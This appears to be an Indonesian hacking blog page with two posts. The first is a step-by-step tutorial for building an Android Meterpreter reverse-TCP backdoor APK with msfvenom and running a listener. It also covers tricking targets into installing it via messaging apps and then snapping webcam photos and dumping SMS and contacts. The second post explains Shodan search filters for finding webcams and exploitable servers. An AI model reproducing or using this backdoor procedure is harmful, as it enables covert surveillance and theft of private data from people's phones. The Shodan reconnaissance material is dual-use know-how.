Cara Hack Android Metode Reverse TCP Backdor

Cara Hack Android Metode Reverse TCP Backdor



hai Kali Linux User :* kali ini gw mau bikin tutor heking aja suntuk pala gw malam minggu stok bokep gw dihapus paksa :'( udah lah tanpa banyak bacot lagi langsung pada inti nya kali ini gw mau share tutorial Sadap Atau Hacking Android Menggunakan metasploit yang pasti masih dalam 1 jaringan LAN / Wifi dengan metode reverse tcp backdoor.

oke pertama cek IP

root@yukinoshita47:~# ifconfig

kemudian tekan enter maka akan muncul ip nya seperti gambar dibawah ini ip gw 192.168.43.28

  
lanjut kita buat dulu backdoor nya dengan perintah 

msfvenom -p android/meterpreter/reverse_tcp LHOST=(ip) LPORT=(port) R > namafile.apk

contoh :

root@yukinoshita47:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.28 LPORT=4444 R > andro.apk

kemudian tekan enter jika muncul seperti gambar dibawah ini berarti berhasil

selanjut nya beri hak akses backdoor nya tadi disini nama backdoor nya andro.apk

root@yukinoshita47:~# chmod 777 andro.apk

kemudian tekan enter 

kemudian buka metasploit console dengan menggunakan perintah

root@yukinoshita47:~# msfconsole

 kemudian tekan enter akan muncul seperti gambar dibawah ini

 selanjut nya aktifkan exploit multi handler dengan masukkan perintah

msf > use multi/handler

kemudian tekan enter

kemudian aktifkan payload nya dengan memasukkan perintah

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

kemudian tekan enter 

selanjut nya set IP dengan menggunakan perintah

msf exploit(handler) > set LHOST 192.168.43.28

kemudian tekan enter 

lalu set port nya dengan memasukkan perintah

msf exploit(handler) > set LPORT 4444



kemudian tekan enter


selanjut nya jalan kan exploit nya dengan memasukkan perintah 

msf exploit(handler) > exploit 

kemudian tekan enter 

selanjut nya adalah penebaran backdoor nya bagaimana cara nya

ya cara nya adalah :

  1. Sebar via internet
  2. Kirim ke Target yang dituju via Facebook, WA, BBM, LINE, dan lainnya dan pastikan Target Menginstall nya
  3. Langsung install ke  smartphone target (you are the real social engineer bro :*)
 kali ini gw ngambil pilihan tiga yaitu install langsung ke smartphone target







kemudian buka backdoor apk nya tadi maka meterpreter session pun aktif disini kita udah dapat akses ke smartphone target langsung 

ini daftar perintah nya masukkan perintah

meterpreter > help

 kemudian tekan enter akan muncul seperti ini

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Android Commands
================

    Command        Description
    -------        -----------
    check_root     Check if device is rooted
    dump_calllog   Get call log
    dump_contacts  Get contacts list
    dump_sms       Get sms messages
    geolocate      Get current lat-long using geolocation




selanjut nya kita coba ambil foto dari kamera smartphone nya dengan memasukkan perintah

meterpreter > webcam_snap

kemudian tekan enter maka akan muncul seperti gambar dibawah ini


walah kok gelap -_- ulangi aja ya 

ulangi lagi meterpreter > webcam_snap kemudian tekan enter


oke berhasil foto nya buram -_- ngapain ya  


gw coba dump kontak smartphone nya dengan memasukkan perintah

meterpreter > dump_contacts

kemudian tekan enter 




aduh error -_- gak ada kontak nya kali ya oke kita coba dump sms aja dengan memasukkan perintah

meterpreter > dump_sms 

kemudian tekan enter


yeey berhasil :D 


kita coba buka ternyata isinya SMS Operator semua :v wkwkwkwkwkwkk 


Tanya : Saya kena backdoor metasploit ini min gimana solusi nya T_T
Jawab : ini jawaban nya

buka Settings > Aplikasi > Cari Apk Metasploit disini namanya MainActivity kemudian buka Apl nya terus pilih paksa berhenti  



maka akses nya terputus seperti gambar dibawah ini : 


baiklah cukup sampai disini tutorial nya lebih dan kurang mohon maaf silahkan explorasi sendiri jika tutorial ini dirasa masih kurang

sekian dan terimakasih

MENGENAL SEARCH ENGINE SHODAN, DAN APA KEGUNAANNYA?

MENGENAL SEARCH ENGINE SHODAN, DAN APA KEGUNAANNYA?


MENGENAL SEARCH ENGINE SHODAN, DAN APA KEGUNAANNYA?

"Shodan is a search engine that lets the user find specific types of computers (web cams, routers, servers, etc.) connected to the internet using a variety of filters. Some have also described it as a search engine of service banners, which are meta-data the server sends back to the client. This can be information about the server software, what options the service supports, a welcome message or anything else that the client can find out before interacting with the server." - Wikipedia
Shodan merupakan search engine (mesin pencari) yang memungkinkan penggunannya untuk mencari berbagai macam komputer termasuk webcam, router, server, dan lainnya secara spesifik dengan menggunakan filter atau sering kita kenal dengan sebutan dork query pada search engine Google.

Nah, didalam artikel kali ini kita akan membahas bagaimana cara menggunakan filter (dork) dan penerapannya dalam tahap reconnaissance (mengumpulkan data atau untuk mencari target), dan scanning (service yang dipakai, port dan lainnya).

Untuk pertama kali, kita harus melakukan pendaftaran terlebih dahulu sebelum dapat memakai fitur search menggunakan filter pada Shodan, kita juga dapat meng-upgradeakun kita menjadi member dengan membayar sebesar $49 untuk seumur hidup, atau sekitar Rp. 650.000,- jika kita rupiah-kan, namun apabila tidak, kita tetap bisa menggunakannya, tetapi dengan dibatasi hasil pencarian yang hanya sebanyak 5 halaman saja.




Apa saja yang bisa kita dapatkan dengan Shodan?
1. Map atau peta, untuk mengetahui letak IP / server komputer
2. Open Ports, port yang sedang terbuka atau port yang dapat diakses diluar NAT
3. Dapat mengetahui service apa saja yang ada pada sebuah server komputer
4. Memfilter ip berdasarkan operasi sistem, negara, kota, perusahaan, ip range,judul, port, service,dan lainnya.
5. Dapat mengetahui kapan ip dimasukkan kedalam database Shodan. 
6. Dapat digunakan untuk pengembangan aplikasi melalui API  Shodan. 



Shodan memiliki beberapa filter yang dapat kita gunakan untuk mencari sesuatu (dalam hal ini komputer dalam jangkauan internet)secara spesifik, seperti filter country yang dapat digunakan untuk mencari komputer yang negaranya sudah ditentukan terlebih dahulu, contoh dari filter ini ialah apabila kita ingin menampilkan IP komputer mana saja yang berasal dari Singapura, maka kita cukup gunakan filter, country:"SG" . Berikut contoh penggunaan filter country.



"SG" merupakan kode negara Singapura, untuk Indonesia kita gunakan "ID" dan Amerika Serikat kita gunakan "US" dan sebagainya.

Filter Server: Bagaimana cara mencari webcam dengan filter "Server" ? 

Penggunaan: 
Server: <server>
Untuk menampilkan ip web camera (webcam) pada hasil pencarian, kita cukup gunakan filter "Server". Seperti, Server: SQ-WEBCAM  


Filter Server tidak hanya digunakan untuk mencari webcam saja, kita bisa gunakan filter tersebut untuk mencari webserver IIS misalnya. Server: IIS

Selain mengetikkan filter country secara langsung, seperti yang tadi sudah dijelaskan,  kita juga dapat mengeklik link yang ada disamping kiri untuk menentukkan negara atau yang lainnya (port, dll..) 

 Filter Port: Bagaimana cara mencari webserver Apache pada port 8080 ?

Penggunaan: 
port:"<port>"  
 Dengan menggunakan filter port, kita dapat mencari ip dengan port tertentu, misalnya webserver Apache dengan port 8080, maka kita gunakan filter port sebagai berikut:
Server: Apache port:"8080"


Filter OS: Bagaiamana mencari server dengan sistem operasi Windows?

Penggunaan:
os:"<nama sistem operasi>"

Dengan dengan menggunakan fiter OS, kita dapat menampilkan hasil ip server dengan os yang kita tentukan, misalnya Windows.
os:"Windows"

Kita juga dapat menggunakan filter yang lebih spesifik, seperti os:"Windows Server 2008 R2"

Filter Title: Bagaimana mencari webserver dengan judul "Indonesia"

Penggunaan:
title:"<judul>"
Untuk mencari webserver yang mempunyai judul tertentu, misalnya "Indonesia" kita dapat menggunakan filter title.title:"Indonesia", maka Shodan akan menampilkan hasil pencarian dengan webserver yang mempunyai judul "Indonesia".




Filter Hostname: Bagaimana mencari ip server dengan hostname tertentu?

Penggunaan:
hostname:"<hostname>"
Untuk mencari ip dengan hostname yang sudah ditentukan, misalnya "telkom.net.id". Maka kita dapat gunkan filter hostname, yaitu hostname:"telkom.net.id"


Untuk mengetahui secara detail ip atau host yang berhasil kita dapat, kita tinggal klik Details pada ip/host yang muncul pada hasil pencarian, maka hasilnya akan terlihat seperti gambar berikut ini.

Disana terlihat jelas peta dan posisi server tersebut berada, dan juga beberapa informasi penting lainnya seperti port, service, dan juga data informasi provider atau organization,maupun tanggal kapan data tersebut didapat atau diperbaharui

Berikut ini filter yang dapat kita gunakan, diantarnya:
title:"<judul>" 
country:"<negara>"
city:"<kota>"
hostname:"<hostname>"
net: <ip range>
port:"<port>"

org:"<nama perusahaan/provider>"
os:"<nama sistem operasi>"

after: <tanggal>
before: <tanggal>

Untuk Penggunaan filter dapat kita gabungkan dan kita kreasikan sesuai kebutuhan dan keperluan masing - masing. Contoh: port:"80" Server: Apache title:"Welcome" country:"US"

Kegunaan search engine shodan untuk keperluan reconnaissance, misalnya untuk mencari ip server yang menggunakan web aplikasi JBoss. Sudah kita ketahui, JBoss untuk beberapa versi memliki beberapa celah vulnerability yang dapat di expliotasi


Demikian artikel yang dapat saya berikan, mohon maaf apabila terjadi kesalahan ataupun ada pihak yang merasa dirugikan, artikel ini hanya bertujuan untuk Ilmu Pengetahuan saja, kirimkan Komentar apabila ada yang ingin ditanyakan,  Semoga bermanfaat